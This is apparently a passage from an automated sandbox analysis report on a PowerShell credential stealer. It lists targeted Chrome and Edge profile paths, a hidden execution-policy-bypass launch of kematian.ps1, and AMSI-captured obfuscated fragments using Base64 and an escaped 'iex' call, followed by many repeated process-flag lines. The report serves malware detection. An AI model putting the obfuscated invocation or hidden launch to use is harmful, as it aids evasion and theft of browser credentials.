13-01-22-078.logC:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\AdobeC:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\C:\Users\user\AppData\Local\Temporary Internet FilesC:\Users\user\AppData\Local\VirtualStoreC:\Users\user\AppData\Local\_curlrcC:\Users\user\AppData\Local\Google\Chrome\User Data\Default\C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\--09AZ__az--09AZ__az--09AZ__azdQw4w9WgXcQ:C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\--09AZ__az--09AZ__az--09AZ__azdQw4w9WgXcQ:nullHARDWARE_ACCELERATION_MODE_PREVIOUSVARIATIONS_FAILED_TO_FETCH_SEED_STREAKVARIATIONS_PERMANENT_CONSISTENCY_COUNTRYVARIATIONS_SAFE_SEED_PERMANENT_CONSISTENCY_COUNTRYVARIATIONS_SAFE_SEED_SESSION_CONSISTENCY_COUNTRY source: powershell.exe, 00000030.00000002.2345550660.000000C00041E000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\SettingsC:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\SystemAppDataC:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\TempStateC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\ACC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\BackgroundTransferApiC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\INetCacheC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\INetCookiesC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalCacheC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalStateC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\RoamingStateC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Settings\roaming.lockC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Settings\settings.datC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Settings\settings.dat.LOG1C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Settings\settings.dat.LOG2C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\SystemAppDataC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\TempStateC:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\AppDataC:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalCacheC:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalStateC:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\RoamingStateC:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\SettingsC:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\roaming.lockC:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\settings.datC:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\SystemAppDataC:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\TempStateC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.errorC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: powershell.exe, 00000030.00000002.2331375157.000000C0002FE000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.pdb source: powershell.exe, 0000002C.00000002.2105443989.00000201CC1ED000.00000004.00000800.00020000.00000000.sdmp

            Data Obfuscation

            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly($name, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) $module = $assembly.DefineDynamicModule('DynamicModule') $typeBuilder = $module.DefineType('PInvokeType', 'Publi
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String("JGtlbWF0aWFuLlNldFZhbHVlKCRudWxsLCR0cnVlKQ==")) | &([regex]::Unescape("\u0069\u0065\u0078")) ([Reflection.Assembly]::LoadWithPartialName(('System.Core')).GetType(('System.Diagnost
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -noprofile -executionpolicy bypass -WindowStyle hidden -file kematian.ps1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.cmdline"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FFD9BAD2300 pushad ; iretd 36_2_00007FFD9BAD232D
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 44_2_00007FFD9BAC25FA push cs; retf 44_2_00007FFD9BAC2602
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 44_2_00007FFD9BAC277C push eax; retf 44_2_00007FFD9BAC2879
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 44_2_00007FFD9BAC289C push eax; retf 44_2_00007FFD9BAC2879
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 48_2_00007FFD9BAC5AEC pushad ; iretd 48_2_00007FFD9BAC5AFA
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 48_2_00007FFD9BAC9AD3 pushad ; ret 48_2_00007FFD9BAC9AE9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 48_2_00007FFD9BAC1A1D pushad ; iretd 48_2_00007FFD9BAC1A81
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 48_2_00007FFD9BB94F1D push edx; iretd 48_2_00007FFD9BB94FA2
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 48_2_00007FFD9BB92149 push eax; iretd 48_2_00007FFD9BB921BA

            Persistence and Installation Behavior

            Source: C:\Windows\System32\cmd.exe File created: C:\Users\user\Desktop\temp.vbs
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.dll

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cscript.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
